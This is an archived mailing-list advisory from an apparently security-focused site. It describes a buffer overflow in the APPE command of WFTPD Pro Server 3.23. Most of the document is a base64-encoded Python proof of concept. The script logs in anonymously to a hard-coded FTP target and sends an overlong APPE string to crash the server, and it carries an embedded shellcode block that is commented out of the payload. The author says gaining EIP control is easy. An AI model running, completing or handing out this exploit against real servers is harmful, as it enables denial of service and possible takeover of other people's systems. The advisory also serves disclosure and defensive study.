AOH :: HP Unsorted W :: B06-5638.HTM

WFTPD Pro Server 3.23 Buffer Overflow



WFTPD Pro Server 3.23 Buffer Overflow
WFTPD Pro Server 3.23 Buffer Overflow



--0-1539039305-1162891589=:29996
Content-Type: text/plain; charset=iso-8859-1
Content-Id: 
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

WFTPD Pro Server 3.23 Buffer Overflow
-------------------------------------

A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwritting EIP
is quite easy but I'm too lazy...

Attached goes an (unfinished) POC.

Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
---------------------------------------------------------------------------

Contact
-------
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<>>>>es


	=09
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y m=F3viles desde 1 c=E9ntimo por minuto. 
http://es.voice.yahoo.com 
--0-1539039305-1162891589=:29996
Content-Type: application/octet-stream; name="bof.py"
Content-Transfer-Encoding: base64
Content-Description: 846879707-bof.py
Content-Disposition: attachment; filename="bof.py"

IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgppbXBvcnQgc3lzCmltcG9ydCBzdHJ1
Y3QKaW1wb3J0IGZ0cGxpYgoKcHJpbnQgIldGVFBEIFBybyBTZXJ2ZXIgMy4y
My4xLjEgQnVmZmVyIE92ZXJmbG93IChPbmx5IGEgRE9TIGN1cnJlbnRseSwg
c2ltcGxlIFBPQykiCnByaW50ICJDb3B5cmlnaHQgKGMpIEpveGVhbiBLb3Jl
dCIKcHJpbnQKCnRhcmdldCA9ICIxOTIuMTY4LjEuMTMiCnRhcmdldFBvcnQg
PSAiMjEiCgp0cnk6CiAgICBmdHAgPSBmdHBsaWIuRlRQKCkKCiAgICBwcmlu
dCAiWytdIENvbm5lY3RpbmcgdG8gdGFyZ2V0ICIKICAgIG1zZyA9IGZ0cC5j
b25uZWN0KHRhcmdldCwgdGFyZ2V0UG9ydCkKICAgIHByaW50ICJbK10gT2su
IFRhcmdldCBiYW5uZXIiCiAgICBwcmludCBtc2cKICAgIHByaW50CiAgICBw
cmludCAiWytdIFRyeWluZyB0byBsb2dnaW5nIGFub255bW91c2x5IgogICAg
bXNnID0gZnRwLmxvZ2luKCkgIyBBbm9ueW1vdXMKICAgIHByaW50ICJbK10g
T2suIE1lc3NhZ2UiCiAgICBwcmludCBtc2cKICAgIHByaW50CmV4Y2VwdDoK
ICAgIHByaW50ICJbIV0gRXhwbG9pdCBkb2Vzbid0IHdvcmsuICIgKyBzdHIo
c3lzLmV4Y19pbmZvKClbMV0pCiAgICBzeXMuZXhpdCgwKQoKCmEgPSAiXFxc
XEE6IgoKZm9yIGkgaW4gcmFuZ2UoNik6CiAgICBhICs9IGEKCnByaW50ICJb
K10gUGFkZGluZyBsZW5ndGggIiArIHN0cihsZW4oYSkpICsgIiBieXRlcyIK
CmIgPSAiQUJDRCIKCmZvciBpIGluIHJhbmdlKDQpOgogICAgYiArPSBiCgph
ID0gYSArICJBQkNEIioxMCArIGIKCnNoZWxsQ29kZSA9ICIiCnNoZWxsQ29k
ZSArPSAiXHgyOVx4YzlceDgzXHhlOVx4YjBceGQ5XHhlZVx4ZDlceDc0XHgy
NFx4ZjRceDViXHg4MVx4NzNceDEzXHhlYyIKc2hlbGxDb2RlICs9ICJceDli
XHgyNlx4OGNceDgzXHhlYlx4ZmNceGUyXHhmNFx4MTBceGYxXHhjZFx4YzFc
eDA0XHg2Mlx4ZDlceDczIgpzaGVsbENvZGUgKz0gIlx4MTNceGZiXHhhZFx4
ZTBceGM4XHhiZlx4YWRceGM5XHhkMFx4MTBceDVhXHg4OVx4OTRceDlhXHhj
OVx4MDciCnNoZWxsQ29kZSArPSAiXHhhM1x4ODNceGFkXHhkM1x4Y2NceDlh
XHhjZFx4YzVceDY3XHhhZlx4YWRceDhkXHgwMlx4YWFceGU2XHgxNSIKc2hl
bGxDb2RlICs9ICJceDQwXHgxZlx4ZTZceGY4XHhlYlx4NWFceGVjXHg4MVx4
ZWRceDU5XHhjZFx4NzhceGQ3XHhjZlx4MDJceGE0IgpzaGVsbENvZGUgKz0g
Ilx4OTlceDdlXHhhZFx4ZDNceGM4XHg5YVx4Y2RceGVhXHg2N1x4OTdceDZk
XHgwN1x4YjNceDg3XHgyN1x4NjciCnNoZWxsQ29kZSArPSAiXHhlZlx4Yjdc
eGFkXHgwNVx4ODBceGJmXHgzYVx4ZWRceDJmXHhhYVx4ZmRceGU4XHg2N1x4
ZDhceDE2XHgwNyIKc2hlbGxDb2RlICs9ICJceGFjXHg5N1x4YWRceGZjXHhm
MFx4MzZceGFkXHhjY1x4ZTRceGM1XHg0ZVx4MDJceGEyXHg5NVx4Y2FceGRj
IgpzaGVsbENvZGUgKz0gIlx4MTNceDRkXHg0MFx4ZGZceDhhXHhmM1x4MTVc
eGJlXHg4NFx4ZWNceDU1XHhiZVx4YjNceGNmXHhkOVx4NWMiCnNoZWxsQ29k
ZSArPSAiXHg4NFx4NTBceGNiXHg3MFx4ZDdceGNiXHhkOVx4NWFceGIzXHgx
Mlx4YzNceGVhXHg2ZFx4NzZceDJlXHg4ZSIKc2hlbGxDb2RlICs9ICJceGI5
XHhmMVx4MjRceDczXHgzY1x4ZjNceGZmXHg4NVx4MTlceDM2XHg3MVx4NzNc
eDNhXHhjOFx4NzVceGRmIgpzaGVsbENvZGUgKz0gIlx4YmZceGM4XHg2NVx4
ZGZceGFmXHhjOFx4ZDlceDVjXHg4YVx4ZjNceDM3XHhkMFx4OGFceGM4XHhh
Zlx4NmQiCnNoZWxsQ29kZSArPSAiXHg3OVx4ZjNceDgyXHg5Nlx4OWNceDVj
XHg3MVx4NzNceDNhXHhmMVx4MzZceGRkXHhiOVx4NjRceGY2XHhlNCIKc2hl
bGxDb2RlICs9ICJceDQ4XHgzNlx4MDhceDY1XHhiYlx4NjRceGYwXHhkZlx4
YjlceDY0XHhmNlx4ZTRceDA5XHhkMlx4YTBceGM1IgpzaGVsbENvZGUgKz0g
Ilx4YmJceDY0XHhmMFx4ZGNceGI4XHhjZlx4NzNceDczXHgzY1x4MDhceDRl
XHg2Ylx4OTVceDVkXHg1Zlx4ZGIiCnNoZWxsQ29kZSArPSAiXHgxM1x4NGRc
eDczXHg3M1x4M2NceGZkXHg0Y1x4ZThceDhhXHhmM1x4NDVceGUxXHg2NVx4
N2VceDRjXHhkYyIKc2hlbGxDb2RlICs9ICJceGI1XHhiMlx4ZWFceDA1XHgw
Ylx4ZjFceDYyXHgwNVx4MGVceGFhXHhlNlx4N2ZceDQ2XHg2NVx4NjRceGEx
IgpzaGVsbENvZGUgKz0gIlx4MTJceGQ5XHgwYVx4MWZceDYxXHhlMVx4MWVc
eDI3XHg0N1x4MzBceDRlXHhmZVx4MTJceDI4XHgzMFx4NzMiCnNoZWxsQ29k
ZSArPSAiXHg5OVx4ZGZceGQ5XHg1YVx4YjdceGNjXHg3NFx4ZGRceGJkXHhj
YVx4NGNceDhkXHhiZFx4Y2FceDczXHhkZCIKc2hlbGxDb2RlICs9ICJceDEz
XHg0Ylx4NGVceDIxXHgzNVx4OWVceGU4XHhkZlx4MTNceDRkXHg0Y1x4NzNc
eDEzXHhhY1x4ZDlceDVjIgpzaGVsbENvZGUgKz0gIlx4NjdceGNjXHhkYVx4
MGZceDI4XHhmZlx4ZDlceDVhXHhiZVx4NjRceGY2XHhlNFx4MWNceDExXHgy
Mlx4ZDMiCnNoZWxsQ29kZSArPSAiXHhiZlx4NjRceGYwXHg3M1x4M2NceDli
XHgyNlx4OGMiCgphID0gYSArICJKT1hFQU4iICMrIHNoZWxsQ29kZQoKcHJp
bnQgIlsrXSBFeHBsb2l0aW5nIHdpdGggYSBidWZmZXIgb2YgIiArIHN0cihs
ZW4oYSkpICsgIiBieXRlKHMpIC4uLiAiCgp0cnk6CiAgICBtc2cgPSBmdHAu
c2VuZGNtZCgiQVBQRSAiICsgYSkKICAgIHByaW50ICJbIV0gRXhwbG9pdCBk
b2Vzbid0IHdvcmsgWyIgKyBtc2cgKyAiXSIKZXhjZXB0OgogICAgcHJpbnQg
IlsrXSBFeHBsb2l0IGFwcGFyZW50bHkgd29ya3MuIFRyeWluZyB0byB2ZXJp
ZnkgaXQgLi4uICIKCiAgICB0cnk6CiAgICAgICAgZnRwLmNvbm5lY3QodGFy
Z2V0LCB0YXJnZXRQb3J0KQogICAgICAgIHByaW50ICJbIV0gTm8sIGl0IGRv
ZXNuJ3Qgd29yayBbIiArIHN0cihzeXMuZXhjX2luZm8oKVsxXSkgKyAiXSA6
KCIKICAgIGV4Y2VwdDoKICAgICAgICBwcmludCAiWyFdIE9rLiBTZXJ2ZXIg
aXMgZGVhZCwgZXhwbG9pdCBzdWNjZXNzZnVsbHkgZXhlY3V0ZWQuICIKCg=

--0-1539039305-1162891589=:29996--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.